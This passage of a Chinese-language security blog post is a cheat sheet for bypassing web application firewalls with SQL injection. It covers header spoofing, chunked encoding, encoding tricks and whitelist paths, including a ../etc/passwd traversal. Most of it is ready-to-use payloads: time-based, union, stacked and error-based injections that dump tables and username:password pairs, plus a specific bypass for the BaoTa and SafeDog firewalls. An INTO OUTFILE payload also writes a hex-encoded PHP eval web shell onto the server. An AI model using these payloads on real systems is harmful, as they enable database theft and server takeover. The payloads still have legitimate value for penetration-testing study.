<h3 id="Cookie-X-Forwarded-For注入绕过"><a href="#Cookie-X-Forwarded-For注入绕过" class="headerlink" title="Cookie/X-Forwarded-For注入绕过:"></a>Cookie/X-Forwarded-For注入绕过:</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">部分WAF可能只对GET，POST提交的参数进行过滤，未对Cookie或者X-Forwarded-For进行检测，可尝试通过cookie或者X-Forwarded-For提交注入参数语句进行绕过.</span><br></pre></td></tr></table></figure>

<h3 id="利用pipline绕过"><a href="#利用pipline绕过" class="headerlink" title="利用pipline绕过:"></a><strong>利用pipline绕过</strong>:</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">当请求中的Connection字段值为keep-alive，则代表本次发起的请求所建立的tcp连接不断开，直到所发送内容结束Connection为close为止。部分WAF可能只对第一次传输过来的请求进行过滤处理.</span><br><span class="line"></span><br><span class="line">首先关闭burp的Repeater的Content-Length自动更新.</span><br><span class="line">修改Connection字段值为keep-alive，将带有攻击语句的数据请求附加到正常请求后面再发送一遍.</span><br></pre></td></tr></table></figure>

<h3 id="Transfer-Encoding"><a href="#Transfer-Encoding" class="headerlink" title="Transfer-Encoding"></a><strong>Transfer-Encoding</strong></h3><p><a href="https://github.com/c0ny1/chunked-coding-converter">分块传输</a>， <a href="https://xz.aliyun.com/t/10278https://github.com/c0ny1/chunked-coding-converter" target="_blank" rel="noopener">文章指路（含插件）</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">chunked:</span><br><span class="line">分块传输编码是HTTP的一种数据传输机制，允许将消息体分成若干块进行发送。当数据请求包中header信息存在Transfer-Encoding: chunked，就代表这个消息体采用了分块编码传输</span><br></pre></td></tr></table></figure>

<p>此外还有</p>
<p><strong>compress,deflate,gzip,identity</strong></p>
<p><code>可以使用逗号,进行连用</code></p>
<h3 id="各种编码绕过"><a href="#各种编码绕过" class="headerlink" title="各种编码绕过:"></a><strong>各种编码绕过</strong>:</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">URL编码,Unicode编码，Base64编码，Hex编码，ASCII编码,各种进制,&#96;科学计数法&#96;等</span><br><span class="line"></span><br><span class="line">** 一&#x2F;二&#x2F;多 次编码绕过 **</span><br><span class="line"></span><br><span class="line">** 其中sql server数据库的 char函数 可以将字符转换为ASCII码，从而达到绕过 gpc 的效果 **</span><br></pre></td></tr></table></figure>

<p>URL编码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">在Chrome中输入一个连接，非保留字的字符浏览器会对其URL编码，如空格变为%20、单引号%27、左括号%28、右括号%29</span><br><span class="line"></span><br><span class="line">普通的URL编码可能无法实现绕过，还存在一种情况URL编码只进行了一次过滤，</span><br><span class="line"></span><br><span class="line">可以用两次编码绕过：page.php?id&#x3D;1%252f%252a*&#x2F;UNION%252f%252a &#x2F;SELECT</span><br></pre></td></tr></table></figure>

<p>Unicode编码(ASP+IIS和ASPX+IIS)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">Unicode有所谓的标准编码和非标准编码，假设我们用的utf-8为标准编码，那么西欧语系所使用的就是非标准编码了</span><br><span class="line"></span><br><span class="line">看一下常用的几个符号的一些Unicode编码：</span><br><span class="line"></span><br><span class="line">单引号: %u0027、%u02b9、%u02bc、%u02c8、%u2032、%uff07、%c0%27、 %c0%a7、%e0%80%a7</span><br><span class="line"></span><br><span class="line">空格:   %u0020、%uff00、%c0%20、%c0%a0、%e0%80%a0</span><br><span class="line"></span><br><span class="line">左括号: %u0028、%uff08、%c0%28、%c0%a8、%e0%80%a8</span><br><span class="line"></span><br><span class="line">右括号: %u0029、%uff09、%c0%29、%c0%a9、%e0%80%a9</span><br><span class="line"></span><br><span class="line">举例:   </span><br><span class="line">?id&#x3D;10%D6‘%20AND%201&#x3D;2%23</span><br><span class="line"></span><br><span class="line">SELECT &#39;Ä&#39;&#x3D;&#39;A&#39;; #1</span><br><span class="line"></span><br><span class="line">两个示例中，前者利用双字节绕过，比如对单引号转义操作变成&#39;，那么就变成了 %D6%5C&#39;</span><br><span class="line">%D6%5C 构成了一个款字节即Unicode字节，单引号可以正常使用</span><br><span class="line"></span><br><span class="line">第二个示例使用的是两种不同编码的字符的比较，它们比较的结果可能是True或者False，</span><br><span class="line">关键在于Unicode编码种类繁多，基于黑名单的过滤器无法处理所以情况，从而实现绕过</span><br><span class="line"></span><br><span class="line">另外平时听得多一点的可能是utf-7的绕过，还有utf-16、utf-32的绕过，后者从成功的实现对google的绕过，有兴趣的朋友可以去了解下</span><br><span class="line"></span><br><span class="line">常见的编码当然还有二进制、八进制，它们不一定都派得上用场，但后面会提到使用二进制的例子</span><br></pre></td></tr></table></figure>

<p>进制转换</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">举例：z.com&#x2F;index.php?page_id&#x3D;-15 &#x2F;!u%6eion&#x2F; &#x2F;!se%6cect&#x2F; 1,2,3,4…</span><br><span class="line"></span><br><span class="line">SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))</span><br><span class="line"></span><br><span class="line">示例代码中，前者是对单个字符十六进制编码，后者则是对整个字符串编码，使用上来说较少见一点</span><br></pre></td></tr></table></figure>

<h3 id="白名单"><a href="#白名单" class="headerlink" title="白名单"></a>白名单</h3><p><code>方式一：IP白名单</code><br>从网络层获取的ip，这种一般伪造不来，如果是应用层的获取的IP，这样就可能存在伪造白名单IP造成bypass<br>测试方法：修改http的header来bypass waf</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">X-forwarded-for</span><br><span class="line">X-remote-IP</span><br><span class="line">X-originating-IP</span><br><span class="line">x-remote-addr</span><br><span class="line">X-Real-ip</span><br></pre></td></tr></table></figure>

<p><code>方式二：静态资源</code><br>特定的静态资源后缀请求，常见的静态文件(.js .jpg .swf .css等等)，类似白名单机制，waf为了检测效率，不去检测<br>这样一些静态文件名后缀的请求。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;10.9.9.201&#x2F;sql.php&#x2F;1.js?id&#x3D;1</span><br><span class="line">备注：Aspx&#x2F;php只识别到前面的.aspx&#x2F;.php 后面基本不识别</span><br></pre></td></tr></table></figure>

<p><code>方式三：url白名单</code><br>为了防止误拦，部分waf内置默认的白名单列表，如admin/manager/system等管理后台。只要url中存在白名单的字<br>符串，就作为白名单不进行检测。常见的url构造姿势：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;10.9.9.201&#x2F;sql.php&#x2F;admin.php?id&#x3D;1</span><br><span class="line">http:&#x2F;&#x2F;10.9.9.201&#x2F;sql.php?a&#x3D;&#x2F;manage&#x2F;&amp;b&#x3D;..&#x2F;etc&#x2F;passwd</span><br><span class="line">http:&#x2F;&#x2F;10.9.9.201&#x2F;..&#x2F;..&#x2F;..&#x2F;manage&#x2F;..&#x2F;sql.asp?id&#x3D;2</span><br></pre></td></tr></table></figure>



<h1 id="基础"><a href="#基础" class="headerlink" title="基础"></a>基础</h1><h3 id="时间型注入"><a href="#时间型注入" class="headerlink" title="时间型注入:"></a>时间型注入:</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">库:</span><br><span class="line">id&#x3D;admin&#39; and if(length(database())&#x3D;8,sleep(5),1)--+</span><br><span class="line">id&#x3D;admin&#39; and if(left(database(),1)&#x3D;&#39;s&#39;,sleep(5),1)--+</span><br><span class="line">表: </span><br><span class="line">id&#x3D;admin&#39; and if(left((select table_name from information_schema.tables where table_schema&#x3D;database() limit 1,1),1)&#x3D;&#39;r&#39; ,sleep(5),1)--+</span><br><span class="line">列:</span><br><span class="line">id&#x3D;admin&#39; and if(left((select column_name from information_schema.columns where table_name&#x3D;&#39;users&#39; limit 4,1),8)&#x3D;&#39;password&#39; ,sleep(5),1)--+</span><br><span class="line">值: </span><br><span class="line">id&#x3D;admin&#39; and if(left((select password from users order by id limit 0,1),4)&#x3D;&#39;dumb&#39; ,sleep(5),1)--+</span><br><span class="line">id&#x3D;admin&#39; and if(left((select username from users order by id limit 0,1),4)&#x3D;&#39;dumb&#39; ,sleep(5),1)--+</span><br></pre></td></tr></table></figure>

<h3 id="布尔型注入"><a href="#布尔型注入" class="headerlink" title="布尔型注入:"></a>布尔型注入:</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">根据 相关表达式是否相等 来判断注入是否成功.</span><br><span class="line">代码与 &quot;1.时间型注入&quot; 相同.</span><br></pre></td></tr></table></figure>

<h3 id="报错型注入"><a href="#报错型注入" class="headerlink" title="报错型注入"></a>报错型注入</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">利用mysql等数据库的特性</span><br></pre></td></tr></table></figure>

<h3 id="UA-referer-Get-Post-cookie注入"><a href="#UA-referer-Get-Post-cookie注入" class="headerlink" title="UA ,referer ,Get/Post,cookie注入"></a>UA ,referer ,Get/Post,cookie注入</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">在UA头里注入 , 在referer里注入 , Get&#x2F;Post方式注入 , 在cookie里注入</span><br></pre></td></tr></table></figure>

<h3 id="联合注入"><a href="#联合注入" class="headerlink" title="联合注入"></a>联合注入</h3><figure class="highlight md"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">1.爆库：</span><br><span class="line">' union select 1,2,3,database() #</span><br><span class="line">2.爆表：</span><br><span class="line">' union select 1,2,3,group<span class="emphasis">_concat(table_</span>name) from information<span class="emphasis">_schema.tables where table_</span>schema=database() #</span><br><span class="line">3.爆字段：</span><br><span class="line">' union select 1,2,3,group<span class="emphasis">_concat(column_</span>name) from information<span class="emphasis">_schema.columns where table_</span>name=0x666c3467#</span><br><span class="line">4.查询：</span><br><span class="line">' union select 1,2,3,skctf_flag from fl4g#</span><br></pre></td></tr></table></figure>

<h3 id="堆叠注入"><a href="#堆叠注入" class="headerlink" title="堆叠注入"></a>堆叠注入</h3><figure class="highlight md"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">爆库:</span><br><span class="line">-1')union select 1,2,database(); %23</span><br><span class="line"></span><br><span class="line">爆表:</span><br><span class="line">-1')union select 1,group<span class="emphasis">_concat(table_</span>name),3 from information<span class="emphasis">_schema.tables where table_</span>schema=database()%23</span><br><span class="line"></span><br><span class="line">爆列名:(以emails表为例)</span><br><span class="line">-1')union select 1,2,group<span class="emphasis">_concat(column_</span>name) from information<span class="emphasis">_schema.columns where table_</span>name="emails" %23</span><br><span class="line"></span><br><span class="line">-1')union select 1,2,id from emails %23</span><br></pre></td></tr></table></figure>



<h3 id="编码注入"><a href="#编码注入" class="headerlink" title="编码注入"></a>编码注入</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">注入的数据必须经过编码,否则注入无效.</span><br></pre></td></tr></table></figure>

<h3 id="正则注入regexp"><a href="#正则注入regexp" class="headerlink" title="正则注入regexp"></a>正则注入regexp</h3><figure class="highlight md"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from users where id=1 and 1=(if((user() regexp '^r'),1,0));</span><br></pre></td></tr></table></figure>

<h3 id="Order-by处注入-即末尾注入"><a href="#Order-by处注入-即末尾注入" class="headerlink" title="Order by处注入(即末尾注入)"></a>Order by处注入(即末尾注入)</h3><figure class="highlight md"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">a. procedure analyse后注入(sqllab-46)</span><br><span class="line">select * from  users order by 1 procedure analyse(extractvalue(rand(),concat(0x3a,version()))</span><br></pre></td></tr></table></figure>



<h2 id="常用SQL注入命令"><a href="#常用SQL注入命令" class="headerlink" title="常用SQL注入命令:"></a>常用SQL注入命令:</h2><p>extractvalue函数,updatexml函数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">爆库:</span><br><span class="line">id&#x3D;admin&#39; and extractvalue(1,concat(0x7e,(select database()))) --+</span><br><span class="line">爆表:</span><br><span class="line">id&#x3D;admin&#39; and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema&#x3D;database()))) --+</span><br><span class="line">查询除emails以外的其他表:</span><br><span class="line">id&#x3D;admin&#39; and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema&#x3D;database() and table_name not in (&#39;emails&#39;)))) --+</span><br><span class="line">爆列名:</span><br><span class="line">id&#x3D;admin&#39; and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name&#x3D;&#39;users&#39;))) --+</span><br><span class="line">爆值:</span><br><span class="line">id&#x3D;admin&#39; and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))--+</span><br><span class="line">同样利用not in,可以查询其他值:</span><br><span class="line">id&#x3D;admin&#39; and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in (&#39;Dumb&#39;,&#39;I-kill-you&#39;))))--+</span><br></pre></td></tr></table></figure>

<h2 id="concat函数"><a href="#concat函数" class="headerlink" title="concat函数"></a>concat函数</h2><p><code>用于回显位不够</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id&#x3D;admin&#39; union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a --+</span><br></pre></td></tr></table></figure>

<h2 id="Into-outfile"><a href="#Into-outfile" class="headerlink" title="Into outfile"></a>Into outfile</h2><figure class="highlight md"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1 LIMIT 0,1 INTO OUTFILE '/gallery/gallery/1.php' LINES TERMINATED BY 0x3c3f706870206576616c28245f524551554553545b315d292d3e-- -</span><br></pre></td></tr></table></figure>







<p>一库三表六字段:</p>
<p><img src="C:%5CUsers%5CJarvis%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20221223090105171.png" alt="image-20221223090105171"></p>
<h1 id="tips"><a href="#tips" class="headerlink" title="tips"></a>tips</h1><ul>
<li><p>sqlmap的payload加载的<code>临界条件</code>:</p>
<p>sqlmap构造的垃圾数据大小最多达到<code>30kb</code>，并且云锁跟宝塔不会拦截。</p>
</li>
</ul>
<ul>
<li><p>win下网络阻塞</p>
<p>强制关闭sqlmap了几次，然后就发现网络阻塞，数据包在win环境下发不出去<br>解决办法就是<code>换kali</code>。</p>
</li>
</ul>
<ul>
<li><p>无法识别的字符</p>
<p>解决办法是采用<code>--hex</code></p>
</li>
</ul>
<p><code>绕宝塔/安全狗：</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">-1&#39;||&#x2F;**&#x2F;if(0,0,benchmark&#x2F;*!&#x2F;*!&#x2F;**&#x2F;*&#x2F;&#x2F;**&#x2F;(10000000,ENCODE(&#39;hello&#39;,&#39;goodbye&#39;)))--+</span><br></pre></td></tr></table></figure>

<p><code>字母大小写转换绕过:(作用很小了)</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">极少WAF只过滤全大写(SLEEP)或者全小写(sleep)的敏感字符，未对sleeP&#x2F;slEEp进行过滤，可对关键字进行大小写转换进行绕过.</span><br><span class="line">(这条作用不大)</span><br></pre></td></tr></table></figure>

<p><code>双关键字绕过(作用很小了)</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">WAF可能会对关键字只进行一次过滤处理，可使用双关键字绕过.</span><br><span class="line">比如:sleSLEEPep</span><br></pre></td></tr></table></figure>

<p><code>%00截断:(作用很小了)</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">部分WAF在解析参数的时候当遇到%00时，就会认为参数读取已结束，这样就会只对部分内容进行了过滤检测。</span><br></pre></td></tr></table></figure>

<h1 id="总结"><a href="#总结" class="headerlink" title="总结:"></a>总结:</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">实际中的WAF检测规则错综复杂，需要我们通过手工或fuzzing，</span><br><span class="line">并结合多种方法的组合拳去测试WAF检测原理，从而对抗WAF.</span><br></pre></td></tr></table></figure>

<h2 id="学习来源"><a href="#学习来源" class="headerlink" title="学习来源:"></a>学习来源:</h2><p>(很全，待研究)</p>
<p><a href="https://xz.aliyun.com/t/12451" target="_blank" rel="noopener">MySQL 注入备忘录</a></p>
<p>(非常详细，构造数字那块堪称精彩)<br><a href="https://www.cnblogs.com/r00tgrok/p/SQL_Injection_Bypassing_WAF_And_Evasion_Of_Filter.html" target="_blank" rel="noopener">深入理解SQL注入绕过WAF和过滤机制</a></p>
<p><a href="https://www.freebuf.com/articles/web/229982.html" target="_blank" rel="noopener">WAF的定义,工作原理,分类,部署方式</a></p>
<p><a href="https://www.yuque.com/weiker/xiaodi/qi668h" target="_blank" rel="noopener">WAF的绕过</a></p>
<p><a href="http://sqlwiki.radare.cn/#/" target="_blank" rel="noopener">SQL注入Wiki</a></p>
<p><a href="https://xz.aliyun.com/t/7449#toc-1" target="_blank" rel="noopener">Bypass安全狗4.0</a></p>
<p><a href="https://xz.aliyun.com/t/10479" target="_blank" rel="noopener">SQL注入bypass最新版安全狗</a></p>
<p><a href="https://xz.aliyun.com/t/10594" target="_blank" rel="noopener">SQL注入之Mysql注入姿势及绕过总结</a></p>
<p>(这个有很多payload,值得研究)<br><a href="https://xz.aliyun.com/t/7767#toc-1" target="_blank" rel="noopener">WAF绕过之SQL注入</a></p>
<p>SQL注入天书</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/friends/">friends</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="https://github.com/TonyD0g">项目</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#混淆Bypass手段-新花"><span class="toc-number">2.</span> <span class="toc-text">混淆Bypass手段(新花)</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#空格过滤绕过"><span class="toc-number">2.0.1.</span> <span class="toc-text">空格过滤绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#关键字匹配绕过-模糊匹配绕过"><span class="toc-number">2.0.2.</span> <span class="toc-text">关键字匹配绕过&#x2F;模糊匹配绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#逗号绕过"><span class="toc-number">2.0.3.</span> <span class="toc-text">逗号绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#冷门函数-字符-运算符绕过"><span class="toc-number">2.0.4.</span> <span class="toc-text">冷门函数&#x2F;字符&#x2F;运算符绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#混淆专题"><span class="toc-number">2.0.5.</span> <span class="toc-text">混淆专题</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#HTTP数据包压缩-编码-文章指路"><span class="toc-number">2.0.6.</span> <span class="toc-text">HTTP数据包压缩&#x2F;编码,文章指路</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#注释符扩展"><span class="toc-number">2.0.7.</span> <span class="toc-text">注释符扩展</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#绕过information-schema"><span class="toc-number">2.0.8.</span> <span class="toc-text">绕过information_schema</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#无列名注入：-建议看原文-提供了各式各样的脚本，可自行魔改"><span class="toc-number">2.0.9.</span> <span class="toc-text">无列名注入：(建议看原文)[提供了各式各样的脚本，可自行魔改]</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#False注入：-建议看原文"><span class="toc-number">2.0.10.</span> <span class="toc-text">False注入：(建议看原文)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#DNS注入"><span class="toc-number">2.0.11.</span> <span class="toc-text">DNS注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#基于BIGINT溢出错误的SQL注入"><span class="toc-number">2.0.12.</span> <span class="toc-text">基于BIGINT溢出错误的SQL注入</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#通用Bypass手段-老树"><span class="toc-number">3.</span> <span class="toc-text">通用Bypass手段(老树)</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#请求方式差异规则松懈性绕过"><span class="toc-number">3.0.1.</span> <span class="toc-text">请求方式差异规则松懈性绕过:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#异常-多种Method绕过"><span class="toc-number">3.0.2.</span> <span class="toc-text">异常&#x2F;多种Method绕过:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#脏数据绕过"><span class="toc-number">3.0.3.</span> <span class="toc-text">脏数据绕过:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#参数污染HPP"><span class="toc-number">3.0.4.</span> <span class="toc-text">参数污染HPP:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#协议未覆盖绕过"><span class="toc-number">3.0.5.</span> <span class="toc-text">协议未覆盖绕过:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#宽字节绕过"><span class="toc-number">3.0.6.</span> <span class="toc-text">宽字节绕过:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Cookie-X-Forwarded-For注入绕过"><span class="toc-number">3.0.7.</span> <span class="toc-text">Cookie&#x2F;X-Forwarded-For注入绕过:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#利用pipline绕过"><span class="toc-number">3.0.8.</span> <span class="toc-text">利用pipline绕过:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Transfer-Encoding"><span class="toc-number">3.0.9.</span> <span class="toc-text">Transfer-Encoding</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#各种编码绕过"><span class="toc-number">3.0.10.</span> <span class="toc-text">各种编码绕过:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#白名单"><span class="toc-number">3.0.11.</span> <span class="toc-text">白名单</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#基础"><span class="toc-number">4.</span> <span class="toc-text">基础</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#时间型注入"><span class="toc-number">4.0.1.</span> <span class="toc-text">时间型注入:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#布尔型注入"><span class="toc-number">4.0.2.</span> <span class="toc-text">布尔型注入:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#报错型注入"><span class="toc-number">4.0.3.</span> <span class="toc-text">报错型注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#UA-referer-Get-Post-cookie注入"><span class="toc-number">4.0.4.</span> <span class="toc-text">UA ,referer ,Get&#x2F;Post,cookie注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#联合注入"><span class="toc-number">4.0.5.</span> <span class="toc-text">联合注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#堆叠注入"><span class="toc-number">4.0.6.</span> <span class="toc-text">堆叠注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#编码注入"><span class="toc-number">4.0.7.</span> <span class="toc-text">编码注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#正则注入regexp"><span class="toc-number">4.0.8.</span> <span class="toc-text">正则注入regexp</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Order-by处注入-即末尾注入"><span class="toc-number">4.0.9.</span> <span class="toc-text">Order by处注入(即末尾注入)</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#常用SQL注入命令"><span class="toc-number">4.1.</span> <span class="toc-text">常用SQL注入命令:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#concat函数"><span class="toc-number">4.2.</span> <span class="toc-text">concat函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Into-outfile"><span class="toc-number">4.3.</span> <span class="toc-text">Into outfile</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#tips"><span class="toc-number">5.</span> <span class="toc-text">tips</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#总结"><span class="toc-number">6.</span> <span class="toc-text">总结:</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#学习来源"><span class="toc-number">6.1.</span> <span class="toc-text">学习来源:</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://github.com/TonyD0g/2022/01/06/WAF%E7%BB%95%E8%BF%87SQL%E6%B3%A8%E5%85%A5%E7%AF%87/" target="_blank" rel="noopener"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://github.com/TonyD0g/2022/01/06/WAF%E7%BB%95%E8%BF%87SQL%E6%B3%A8%E5%85%A5%E7%AF%87/&text=[WAF绕过]SQL注入篇" target="_blank" rel="noopener"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://github.com/TonyD0g/2022/01/06/WAF%E7%BB%95%E8%BF%87SQL%E6%B3%A8%E5%85%A5%E7%AF%87/&title=[WAF绕过]SQL注入篇" target="_blank" rel="noopener"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://github.com/TonyD0g/2022/01/06/WAF%E7%BB%95%E8%BF%87SQL%E6%B3%A8%E5%85%A5%E7%AF%87/&is_video=false&description=[WAF绕过]SQL注入篇" target="_blank" rel="noopener"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=[WAF绕过]SQL注入篇&body=Check out this article: https://github.com/TonyD0g/2022/01/06/WAF%E7%BB%95%E8%BF%87SQL%E6%B3%A8%E5%85%A5%E7%AF%87/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://github.com/TonyD0g/2022/01/06/WAF%E7%BB%95%E8%BF%87SQL%E6%B3%A8%E5%85%A5%E7%AF%87/&title=[WAF绕过]SQL注入篇" target="_blank" rel="noopener"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
